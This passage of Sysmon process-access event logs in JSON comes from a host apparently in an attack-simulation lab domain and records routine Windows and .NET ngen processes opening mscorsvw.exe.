08:05:35.445","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-001018120D00}","TargetProcessId":"2932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7329,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.491\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010FC150D00}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.491","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010FC150D00}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7330,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.491\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010FC150D00}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.491","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010FC150D00}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7331,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.491\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-0010FC150D00}\r\nTargetProcessId: 2896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.491","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-0010FC150D00}","TargetProcessId":"2896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7332,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.538\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010F4A30B00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.538","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010F4A30B00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7333,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.538\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010F4A30B00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.538","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010F4A30B00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7334,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.538\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010F4A30B00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.538","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010F4A30B00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7335,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:35.570\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-0010BCB90C00}\r\nTargetProcessId: 4252\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:35.570","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-0010BCB90C00}","TargetProcessId":"4252","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\